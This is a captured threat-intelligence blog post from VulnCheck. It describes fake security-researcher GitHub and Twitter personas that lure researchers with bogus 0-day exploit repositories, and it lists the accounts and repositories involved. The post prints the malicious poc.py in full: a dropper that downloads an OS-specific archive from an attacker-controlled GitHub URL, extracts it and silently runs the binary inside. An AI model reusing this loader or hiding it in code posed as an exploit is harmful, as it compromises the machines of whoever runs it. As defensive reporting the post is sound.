<!DOCTYPE html>
<html lang="en">
<head><meta charset="utf-8">
<meta charset="utf-8">
<title>Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="msapplication-TileColor" content="#6667ab">
<meta name="theme-color" content="#6667ab">
<meta property="og:type" content="website">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-mobile-mobile-web-app-status-bar-style" content="#362f79">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="icon" id="favicon" type="image/x-icon" href="/favicon.ico">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#6667ab">
<meta name="description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta itemprop="name" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta itemprop="description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta itemprop="image" content="https://vulncheck.com/cards/blog/fake-repos-deliver-malicious-implant.png">
<meta property="og:site_name" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta property="og:url" content="https://vulncheck.com/blog/fake-repos-deliver-malicious-implant">
<meta property="og:image" content="https://vulncheck.com/cards/blog/fake-repos-deliver-malicious-implant.png">
<meta property="og:title" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta property="og:description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://vulncheck.com/cards/blog/fake-repos-deliver-malicious-implant.png">
<meta name="twitter:title" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta name="twitter:description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta property="og:title" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta name="description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta property="og:description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
</head>
<body ><div id="__nuxt"><div><!--[--><div><!----><div class="relative min-h-screen"><!--[--><div class="lg:max-w-screen-xl mx-auto px-4 md:px-8 lg:px-16 relative"><!--[--><div class="pt-32"><div class="max-w-screen-md mx-auto mt-16"><time datetime="2023-06-14T00:00:00.000Z">June 
14, 2023</time><h1 class="text-4xl font-bold py-4">Fake Security Researcher GitHub Repositories Deliver Malicious Implant</h1><div><div class="flex items-center space-x-2 mb-16"><img src="https://ca.slack-edge.com/T02P16KHNRY-U03S81HQS1J-19e0ae9f7b3c-512" class="w-10 h-10 rounded-full" alt="avatar"><div class="flex flex-col text-sm"><span class="font-bold">Jacob Baines</span><a href="https://twitter.com/Junior_Baines" class="text-logo-a dark:text-logo-b">@Junior_Baines</a></div></div></div><main class="md"><!--[--><div><div><h1>Key Takeaways</h1><div class="ml-2 flex flex-col space-y-2 mt-4 mb-8"><!--[--><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>In early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. 
The same scenario continued throughout May.</span></div><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.</span></div><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. 
Some of the accounts even advertise their “findings” on Twitter.</span></div><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.</span></div><!--]--></div></div><p><!--[-->As part of VulnCheck’s <a href="https://vulncheck.com/product/exploit-intelligence" rel="nofollow"><!--[-->Exploit Intelligence<!--]--></a> offering, we monitor and review large amounts of GitHub repositories. The review process exists to filter out useless, malicious, and/or scam repositories. In early May, during routine reviews, we came across an obviously malicious GitHub <a href="https://github.com/researchkendra91/signal-zeroday-exploit" rel="nofollow"><!--[-->repository<!--]--></a> that claimed to be a Signal 0-day. We reported the repository to GitHub, and it was quickly taken down.<!--]--></p><p><!--[-->The very next day, an almost identical repository was created under a different account, but this time claiming to be a <a href="https://github.com/darthvander20/whatsapp-zero-day-exploit/blob/main/poc.py" rel="nofollow"><!--[-->WhatsApp zero-day<!--]--></a>. Again, we worked with GitHub to get the repository taken down. This process kept repeating itself throughout May.<!--]--></p><p><!--[-->More recently, however, the individual(s) creating these repositories have put more effort into making them look legitimate by creating a network of accounts. 
The attacker has created half a dozen GitHub accounts and a handful of associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High Sierra Cyber Security. Below is an example of one such account:<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/sanderson.png" alt="GSanderson"><!--]--></p><p><!--[-->The profile looks like a normal security researcher account. The account has a headshot, followers, an associated organization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized that “Andrei Kuzman” was using a headshot of a <a href="https://www.rapid7.com/globalassets/_images/people/curt-barnard1.png" rel="nofollow"><!--[-->Rapid7 employee<!--]--></a>. So it appears the attacker is not only making efforts to make the profiles look legitimate, but also using headshots of actual security researchers.<!--]--></p><p><!--[-->Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/kuzman.png" alt="Kuzman"><!--]--></p><p><!--[-->The repositories all follow a very simple formula. They all look like the following image (including tagging of “hot” CVEs to attract victims):<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/layout.png" alt="Repo Layout"><!--]--></p><p><!--[--><code><!--[-->poc.py<!--]--></code> contains code that downloads a malicious binary and then executes it. The Python script will download a different payload depending on the victim’s host operating system. 
The above Discord “0-day” uses the following code to perform these actions:<!--]--></p><!--[--><pre><code><span class="line" line="1"><span class="ct-794887">if</span><span class="ct-836158"> </span><span class="ct-869604">__name__</span><span class="ct-836158"> </span><span class="ct-794887">==</span><span class="ct-836158"> </span><span class="ct-169668">&#39;__main__&#39;</span><span class="ct-836158">:
</span></span><span class="line" line="2"><span class="ct-836158">    </span><span class="ct-794887">if</span><span class="ct-836158"> os.name </span><span class="ct-794887">==</span><span class="ct-836158"> </span><span class="ct-169668">&#39;nt&#39;</span><span class="ct-836158">:
</span></span><span class="line" line="3"><span class="ct-836158">        </span><span class="ct-794887">try</span><span class="ct-836158">:
</span></span><span class="line" line="4"><span class="ct-836158">            namezip </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveswindows.zip&quot;
</span></span><span class="line" line="5"><span class="ct-836158">            name    </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveswindows&quot;
</span></span><span class="line" line="6"><span class="ct-836158">            url </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveswindows.zip&quot;
</span></span><span class="line" line="7"><span class="ct-836158">            des </span><span class="ct-794887">=</span><span class="ct-836158"> os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], namezip)
</span></span><span class="line" line="8"><span class="ct-836158">            </span><span class="ct-794887">if</span><span class="ct-836158"> </span><span class="ct-794887">not</span><span class="ct-836158"> os.path.exists(os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], name, name </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;.exe&quot;</span><span class="ct-836158">)):
</span></span><span class="line" line="9"><span class="ct-836158">                urllib.request.urlretrieve(url, des)
</span></span><span class="line" line="10"><span class="ct-836158">                </span><span class="ct-794887">with</span><span class="ct-836158"> </span><span class="ct-363298">open</span><span class="ct-836158">(des, </span><span class="ct-169668">&#39;wb&#39;</span><span class="ct-836158">) </span><span class="ct-794887">as</span><span class="ct-836158"> f: f.write(urllib.request.urlopen(url).read())
</span></span><span class="line" line="11"><span class="ct-836158">                zf </span><span class="ct-794887">=</span><span class="ct-836158"> ZipFile(des, </span><span class="ct-169668">&#39;r&#39;</span><span class="ct-836158">)
</span></span><span class="line" line="12"><span class="ct-836158">                zf.extractall(os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], name))
</span></span><span class="line" line="13"><span class="ct-836158">                zf.close()
</span></span><span class="line" line="14"><span class="ct-836158">                pid </span><span class="ct-794887">=</span><span class="ct-836158"> subprocess.Popen([os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], name, name </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;.exe&quot;</span><span class="ct-836158">)], </span><span class="ct-402719">creationflags</span><span class="ct-794887">=</span><span class="ct-854774">0x</span><span class="ct-360247">00000008</span><span class="ct-836158"> </span><span class="ct-794887">|</span><span class="ct-836158"> subprocess.</span><span class="ct-360247">CREATE_NO_WINDOW</span><span class="ct-836158">).pid
</span></span><span class="line" line="15"><span class="ct-836158">        </span><span class="ct-794887">except</span><span class="ct-836158">:
</span></span><span class="line" line="16"><span class="ct-836158">            </span><span class="ct-794887">pass
</span></span><span class="line" line="17"><span class="ct-836158">    </span><span class="ct-794887">else</span><span class="ct-836158">:
</span></span><span class="line" line="18"><span class="ct-836158">        url </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveslinux.zip&quot;
</span></span><span class="line" line="19"><span class="ct-836158">        namezip </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveslinux.zip&quot;
</span></span><span class="line" line="20"><span class="ct-836158">        name    </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveslinux&quot;
</span></span><span class="line" line="21"><span>
</span></span><span class="line" line="22"><span class="ct-836158">        des </span><span class="ct-794887">=</span><span class="ct-836158"> os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, namezip)
</span></span><span class="line" line="23"><span class="ct-836158">        </span><span class="ct-794887">if</span><span class="ct-836158"> </span><span class="ct-794887">not</span><span class="ct-836158"> os.path.exists(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name)):
</span></span><span class="line" line="24"><span class="ct-836158">            urllib.request.urlretrieve(url, des)
</span></span><span class="line" line="25"><span class="ct-836158">            </span><span class="ct-794887">with</span><span class="ct-836158"> </span><span class="ct-363298">open</span><span class="ct-836158">(des, </span><span class="ct-169668">&#39;wb&#39;</span><span class="ct-836158">) </span><span class="ct-794887">as</span><span class="ct-836158"> f: f.write(urllib.request.urlopen(url).read())
</span></span><span class="line" line="26"><span class="ct-836158">            zf </span><span class="ct-794887">=</span><span class="ct-836158"> ZipFile(des, </span><span class="ct-169668">&#39;r&#39;</span><span class="ct-836158">)
</span></span><span class="line" line="27"><span class="ct-836158">            zf.extractall(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name))
</span></span><span class="line" line="28"><span class="ct-836158">            zf.close()
</span></span><span class="line" line="29"><span class="ct-836158">            st </span><span class="ct-794887">=</span><span class="ct-836158"> os.stat(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name))
</span></span><span class="line" line="30"><span class="ct-836158">            os.chmod(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name), st.st_mode </span><span class="ct-794887">|</span><span class="ct-836158"> stat.</span><span class="ct-360247">S_IEXEC</span><span class="ct-836158">)
</span></span><span class="line" line="31"><span class="ct-836158">            subprocess.Popen([</span><span class="ct-169668">&quot;/bin/bash&quot;</span><span class="ct-836158">, </span><span class="ct-169668">&quot;-c&quot;</span><span class="ct-836158">, os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name)], </span><span class="ct-402719">start_new_session</span><span class="ct-794887">=</span><span class="ct-360247">True</span><span class="ct-836158">, </span><span class="ct-402719">stdout</span><span class="ct-794887">=</span><span class="ct-836158">subprocess.</span><span class="ct-360247">DEVNULL</span><span class="ct-836158">, </span><span class="ct-402719">stderr</span><span class="ct-794887">=</span><span class="ct-836158">subprocess.</span><span class="ct-360247">STDOUT</span><span class="ct-836158">)
</span></span><span class="line" line="32"><span>
</span></span><span class="line" line="33"><span>
</span></span><span class="line" line="34"><span class="ct-836158">    main()</span></span></code></pre><!--]--><p><!--[-->Above, <code><!--[-->poc.py<!--]--></code> downloads one of two zip files, depending on the host operating system: either <code><!--[-->cveslinux.zip<!--]--></code> or <code><!--[-->cveswindows.zip<!--]--></code> is fetched from GitHub, written to disk, unzipped, and the binary inside is executed. Both branches run quietly: on Linux the archive is extracted to <code>/home/&lt;user&gt;/.local/share/cveslinux/</code>, the binary is marked executable and started in a new session with its output discarded, while on Windows it is extracted to <code>cveswindows</code> under the <code>TMP</code> directory and started without a console window, so those two locations are the first places to check on a host that ran the script. The Windows binary has a very high detection rate on VirusTotal (<a href="https://www.virustotal.com/gui/file/777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4" rel="nofollow"><!--[-->43/71<!--]--></a>). The Linux binary is detected far less often (<a href="https://www.virustotal.com/gui/file/ba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733/detection" rel="nofollow"><!--[-->3/62<!--]--></a>), but it contains some very obvious strings indicating its nature.<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/ghidra.png" alt="Ghidra view of the malicious binary"><!--]--></p><p><!--[-->The attacker has put a lot of effort into creating all these fake personas, only to deliver very obvious malware. It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attack, it seems they believe they <em><!--[-->will<!--]--></em> be successful.<!--]--></p><p><!--[-->It isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the campaign uncovered by <a href="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/" rel="nofollow"><!--[-->Google TAG in January 2021<!--]--></a>. Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. 
Always review the code you are executing and don’t use anything you don’t understand.<!--]--></p><p><!--[-->If you have engaged with any of the following accounts, consider the possibility that you’ve been compromised.<!--]--></p><h3 id="github-accounts"><a href="#github-accounts"><!--[-->GitHub Accounts<!--]--></a></h3><ol><!--[--><li><!--[--><a href="https://github.com/AKuzmanHSCS" rel="nofollow"><!--[-->https://github.com/AKuzmanHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/RShahHSCS" rel="nofollow"><!--[-->https://github.com/RShahHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/BAdithyaHSCS" rel="nofollow"><!--[-->https://github.com/BAdithyaHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/DLandonHSCS" rel="nofollow"><!--[-->https://github.com/DLandonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/MHadzicHSCS" rel="nofollow"><!--[-->https://github.com/MHadzicHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/GSandersonHSCS" rel="nofollow"><!--[-->https://github.com/GSandersonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/SSankkarHSCS" rel="nofollow"><!--[-->https://github.com/SSankkarHSCS<!--]--></a><!--]--></li><!--]--></ol><h3 id="malicious-repositories"><a href="#malicious-repositories"><!--[-->Malicious Repositories<!--]--></a></h3><ol><!--[--><li><!--[--><a href="https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE" rel="nofollow"><!--[-->https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/MHadzicHSCS/Chrome-0-day" rel="nofollow"><!--[-->https://github.com/MHadzicHSCS/Chrome-0-day<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/GSandersonHSCS/discord-0-day-fix" rel="nofollow"><!--[-->https://github.com/GSandersonHSCS/discord-0-day-fix<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/BAdithyaHSCS/Exchange-0-Day" 
rel="nofollow"><!--[-->https://github.com/BAdithyaHSCS/Exchange-0-Day<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/RShahHSCS/Discord-0-Day-Exploit" rel="nofollow"><!--[-->https://github.com/RShahHSCS/Discord-0-Day-Exploit<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/DLandonHSCS/Discord-RCE" rel="nofollow"><!--[-->https://github.com/DLandonHSCS/Discord-RCE<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/SSankkarHSCS/Chromium-0-Day" rel="nofollow"><!--[-->https://github.com/SSankkarHSCS/Chromium-0-Day<!--]--></a><!--]--></li><!--]--></ol><h3 id="twitter-accounts"><a href="#twitter-accounts"><!--[-->Twitter Accounts<!--]--></a></h3><ol><!--[--><li><!--[--><a href="https://twitter.com/AKuzmanHSCS" rel="nofollow"><!--[-->https://twitter.com/AKuzmanHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://twitter.com/DLandonHSCS" rel="nofollow"><!--[-->https://twitter.com/DLandonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://twitter.com/GSandersonHSCS" rel="nofollow"><!--[-->https://twitter.com/GSandersonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://twitter.com/MHadzicHSCS" rel="nofollow"><!--[-->https://twitter.com/MHadzicHSCS<!--]--></a><!--]--></li><!--]--></ol><style>.ct-794887{color:#CF222E;}
.sepia .ct-360247{color:#AE81FF;}</style></div><!--]--></main></div></div><!--]--></div><!--]--><!----></div><div><div class="lg:max-w-screen-xl mx-auto px-4 md:px-8 lg:px-16 relative py-24"><!--[--><!--]--></div></div><footer aria-labelledby="footer-heading" class="py-16"><div id="footer-heading" class="sr-only">Footer</div><div class="lg:max-w-screen-xl mx-auto px-4 md:px-8 lg:px-16 relative"><!--[--><div class="grid grid-cols-1 lg:grid-cols-4"><div class="px-4 flex-1 h-full flex flex-col justify-between text-gray-400"><a href="/" class="flex transition-colors duration-200 overflow-hidden gray w-40 h-10 mb-6 lg:mb-0" aria-label="Logo"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 800.5 160.35"><path d="M254.12,44.23l-25.3,58.09-25.07-58.09h-15.22l32.95,75.36h13.79l32.87-75.36h-14.01Zm61.05,17.88v29.01c0,11.51-6.36,17.35-15.75,17.35-8.48,0-13.41-4.92-13.41-15.38v-30.98h-13.48v32.8c0,17.34,10,25.45,24.77,25.45,7.42,0,14.24-2.8,18.56-8.1v7.35h12.8V62.11h-13.48Zm31.13,57.49h13.48V39.69h-13.48V119.6Zm63.7-58.17c-8.33,0-15.38,2.8-19.77,8.1v-7.42h-12.8v57.49h13.41v-29.09c0-11.51,6.51-17.35,16.06-17.35,8.63,0,13.71,4.92,13.71,15.15v31.28h13.41v-32.95c0-17.35-10.23-25.22-24.01-25.22h0Zm77.33,59.23c12.42,0,22.95-4.39,29.92-12.57l-9.01-8.63c-5.53,5.98-12.27,8.94-20.15,8.94-15.6,0-26.89-10.98-26.89-26.51s11.29-26.51,26.89-26.51c7.88,0,14.62,2.95,20.15,8.86l9.01-8.48c-6.97-8.18-17.5-12.65-29.84-12.65-23.1,0-40.37,16.28-40.37,38.78s17.27,38.78,40.3,38.78h0Zm74.76-59.23c-8.03,0-14.77,2.58-19.16,7.35v-29.09h-13.48V119.6h13.48v-29.09c0-11.51,6.44-17.35,15.98-17.35,8.63,0,13.71,4.92,13.71,15.15v31.28h13.48v-32.95c0-17.35-10.23-25.22-24.01-25.22h0Zm95.66,29.69c0-17.95-12.27-29.69-29.01-29.69s-29.77,12.27-29.77,29.39,12.5,29.54,31.81,29.54c9.85,0,17.95-3.26,23.1-9.39l-7.2-8.33c-4.09,4.24-9.16,6.29-15.6,6.29-10,0-17.04-5.38-18.63-13.79h45.14c.08-1.29,.15-2.88,.15-4.01h0Zm-29.01-18.94c8.79,0,15.15,5.76,16.21,14.01h-32.65c1.36-8.41,7.65-14.01,16.44-14.01h0Zm68.32,48.17c11.21,0,20
6h16"/></g></svg><span>Vulnerability Disclosure Policy</span></a></li><!--]--></ul><!--]--></div></div><!--]--></div></footer></div><!--]--><!----><div class="fixed flex flex-col justify-end z-[55] lg:top-0 lg:right-0 w-full sm:w-96"><!----></div></div></div><script>window.__NUXT__=(function(a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z,_,$,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,al,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,aA,aB,aC,aD,aE,aF,aG,aH,aI,aJ,aK){return {data:{"content-query-C5tE1t07Tq":{_path:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant",_dir:P,_draft:f,_partial:f,_locale:r,_empty:f,title:"Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck",description:"VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.",type:P,slug:"fake-repos-deliver-malicious-implant",blogtitle:"Fake Security Researcher GitHub Repositories Deliver Malicious Implant",date:"2023-06-14T00:00:00.000Z",image:"blog\u002Ffake-repos-deliver-malicious-implant.png",author:{name:"Jacob Baines",avatar:"https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U03S81HQS1J-19e0ae9f7b3c-512",link:"https:\u002F\u002Ftwitter.com\u002FJunior_Baines",linkName:"@Junior_Baines"},body:{type:"root",children:[{type:a,tag:"check-list",props:{":list":"[\"In early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. 
The same scenario continued throughout May.\",\"Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.\",\"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their “findings” on Twitter.\",\"Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.\"]",ico:"mdi:check-bold",title:"Key Takeaways"},children:[]},{type:a,tag:p,props:{},children:[{type:b,value:"As part of VulnCheck’s "},{type:a,tag:l,props:{href:"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fexploit-intelligence",rel:[m]},children:[{type:b,value:"Exploit Intelligence"}]},{type:b,value:" offering, we monitor and review large amounts of GitHub repositories. The review process exists to filter out useless, malicious, and\u002For scam repositories. In early May, during routine reviews, we came across an obviously malicious GitHub "},{type:a,tag:l,props:{href:"https:\u002F\u002Fgithub.com\u002Fresearchkendra91\u002Fsignal-zeroday-exploit",rel:[m]},children:[{type:b,value:"repository"}]},{type:b,value:" that claimed to be a Signal 0-day. 
We reported the repository to GitHub, and it was quickly taken down."}]},{type:a,tag:p,props:{},children:[{type:b,value:"The very next day, an almost identical repository was created under a different account, but this time claiming to be a "},{type:a,tag:l,props:{href:"https:\u002F\u002Fgithub.com\u002Fdarthvander20\u002Fwhatsapp-zero-day-exploit\u002Fblob\u002Fmain\u002Fpoc.py",rel:[m]},children:[{type:b,value:"WhatsApp zero-day"}]},{type:b,value:". Again, we worked with GitHub to get the repository taken down. This process kept repeating itself throughout May."}]},{type:a,tag:p,props:{},children:[{type:b,value:"More recently, however, the individual(s) creating these repositories have put more effort into making them look legitimate by creating a network of accounts. The attacker has created half a dozen GitHub accounts and a handful of associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High Sierra Cyber Security. Below is an example of one such account:"}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:"GSanderson",src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fsanderson.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:b,value:"The profile looks like a normal security researcher account. The account has a headshot, followers, an associated organization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized “Andrei Kuzman” was using a headshot of a "},{type:a,tag:l,props:{href:"https:\u002F\u002Fwww.rapid7.com\u002Fglobalassets\u002F_images\u002Fpeople\u002Fcurt-barnard1.png",rel:[m]},children:[{type:b,value:"Rapid7 employee"}]},{type:b,value:". 
So it appears the attacker is not only making efforts to make the profiles look legitimate, but also using headshots of actual security researchers."}]},{type:a,tag:p,props:{},children:[{type:b,value:"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:"}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:"Kuzman",src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fkuzman.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:b,value:"The repositories all follow a very simple formula. They all look like the following image (including tagging “hot” CVEs to attract victims):"}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:Q,src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Flayout.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:a,tag:B,props:{},children:[{type:b,value:R}]},{type:b,value:" contains the code that downloads a malicious binary and then executes it. The Python script downloads a different payload depending on the victim’s host operating system. 
